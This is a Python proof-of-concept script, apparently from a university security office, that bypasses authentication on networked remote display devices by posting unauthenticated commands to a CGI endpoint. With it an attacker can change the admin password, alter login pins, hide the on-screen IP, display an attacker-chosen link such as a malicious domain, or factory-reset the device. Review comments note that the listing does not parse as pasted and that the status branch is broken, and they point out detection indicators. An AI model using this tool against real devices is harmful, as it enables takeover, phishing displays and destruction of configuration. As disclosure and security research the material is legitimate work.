#!/usr/bin/env python
## POC remote display authentication bypass tool
## Carnegie Mellon University
## Information Security Office
## Author: Brian W. Gray
## Initial Creation Date: 07.02.2014
## Last updated: 07.07.2014
version="%prog 0.03a"
# NOTE(review): block indentation is missing throughout this listing (the try/except
# and if/elif bodies are all at column 0), so the file as pasted does not parse; the
# structure described in the comments below is read from the keywords, not the indent.
# The script targets Python 2 (urllib2, print statement on the loop below).
import urllib
import urllib2
try:
import xml.etree.cElementTree as ET # Load cElementTree for performance gain
except ImportError:
import xml.etree.ElementTree as ET # Fail back to ElementTree if cElementTree is not available
from optparse import OptionParser
# Command-line interface. All three options are mandatory and checked right after parsing.
usage = "usage: %prog -i [address] -a [action] -o [option input]"
parser = OptionParser(usage=usage, version=version)
parser.add_option("-i", "--ip", dest="selHost",
help="Provide the device address [192.168.100.10]", metavar="value")
parser.add_option("-a", "--action", dest="selAction",
help="Select an action [password, pin, setpin, showip, setlink, status, factoryreset]", metavar="value")
parser.add_option("-o", "--option", dest="selOption",
help="Provide an option to the Action [password [yourPassword], pin [enable / disable], setpin [0000], showip [enable / disable], setlink [hostname], status [query], factoryreset [raze]]", metavar="value")
(options, args) = parser.parse_args()
# parser.error() prints the usage text and exits; nothing below runs with a missing argument.
if not options.selHost:
parser.error('A device address was not provided. Use -h for help')
if not options.selAction:
parser.error('An action selection was not provided. Use -h for help')
if not options.selOption:
parser.error('An option was not provided. Use -h for help')
selHost = options.selHost
selAction = options.selAction
selOption = options.selOption
# Toggle value shared by the "pin" and "showip" actions; "0" is the disabled/default state.
optionValue = "0"
# Set device return_test.cgi URI.
# Plain HTTP: the whole request, including any password or pin passed via -o, crosses
# the network in cleartext. Nothing in this file attaches a credential, cookie or token
# to the request, so the tool presumably relies on the endpoint accepting these commands
# unauthenticated (the "bypass" in the header). From the defender's side the control
# that remains is limiting which hosts can reach the device's web interface at all.
url = 'http://' + selHost + '/cgi-bin/return_test.cgi'
# Each branch below only assembles the string later sent as the "command" POST field.
# Set a new password
if selAction == "password":
buildCommand = "Pwd_admin"+selOption+""
# Enable or Disable pins
elif selAction == "pin":
if selOption == "enable":
optionValue = "1"
elif selOption == "disable":
optionValue = "0"
else:
print('\r\nYou have provided an Unknown option for configuring pins options are enable or disable defaulting to disable')
optionValue = "0"
buildCommand = "LoginCodeType"+optionValue+""
# Set a static pin for the on screen display.
elif selAction == "setpin":
# int() on a non-numeric -o value raises ValueError here; it is not caught.
if int(selOption) >= 0 and int(selOption) < 10000 :
print ('\r\nSetting pin to ' + selOption)
else:
print('\r\nYou have provided an invalid option and the pin has defaulted to 0000')
selOption = "0000"
# The pin is embedded in a longer fixed command; the meaning of the surrounding
# videooutput/Resolution/UNDER_SC* fields is not documented anywhere in this file.
buildCommand = "LoginCodeType2videooutput4Resolution4LOGIN"+selOption+"UNDER_SCAN0UNDER_SCX00UNDER_SCY00UNDER_SCX165535UNDER_SCY165535"
# Enable or Disable the on screen display of the ip address.
elif selAction == "showip":
if selOption == "enable":
optionValue = "1"
elif selOption == "disable":
optionValue = "0"
else:
print('\r\nYou have provided an Unknown option for showip options are enable or disable defaulting to disable')
optionValue = "0"
buildCommand = "OSDIPOnOff"+optionValue+""
# Rename the host to display a custom link on screen. ex. (-a setlink -o malicious.collectingyour.info) Combine with (-a showip -o disable) actions.
# Both DOMAIN_NAME and WL_ESSID are set to the same -o value. For a defender, an
# unexpected hostname or URL shown on a display is itself an indicator that this
# setting was changed.
elif selAction == "setlink":
buildCommand = "DOMAIN_NAME"+selOption+"WL_ESSID"+selOption+"ControlSystemId5"
# Query device status for debugging.
elif selAction == "status":
if selOption == "query":
buildCommand = ""
else:
print('\r\n -o query is being assumed to request device status')
# NOTE(review): `query` is not defined anywhere in this file, and buildCommand is not
# assigned on this path, so as written this else-branch raises NameError before any
# request is sent.
selOption = query
# Reset the device to factory defaults.
elif selAction == "factoryreset":
if selOption == "raze":
buildCommand = "r99"
else:
print('\r\nYou must supply -o raze to reset this device to factory settings')
exit()
else:
print('\r\nYou have selected an Unknown Action')
exit()
# Build and send HTML POST
values = {}
values['command'] = buildCommand
data = urllib.urlencode(values)
# Fixed User-Agent. Note the value itself begins with "User-Agent: ", so the header
# goes out with that prefix duplicated. Together with a POST to /cgi-bin/return_test.cgi
# this is a stable indicator for web/proxy log review of traffic to these devices.
headers = { 'User-Agent' : 'User-Agent: CMU/2.2 CFNetwork/672.0.8 Darwin/14.0.0' }
req = urllib2.Request(url, data, headers)
# urlopen is called without a timeout and without error handling (HTTPError/URLError
# propagate); the response object is never closed explicitly.
response = urllib2.urlopen(req)
html = response.read()
# Parse and display Boa response
# The device reply is fed to the stdlib XML parser as-is, with no size limit and no
# handling for a non-XML body (ET.ParseError propagates). The tool trusts the device.
root = ET.fromstring(html)
print ("\r\nBoa service response: \r\n")
# for node in root.findall(".//*"):
# Dump every element of the reply tree as "tag : text" for manual inspection.
for node in root.iter():
print node.tag, ":", node.text
print ("\r\n")
exit()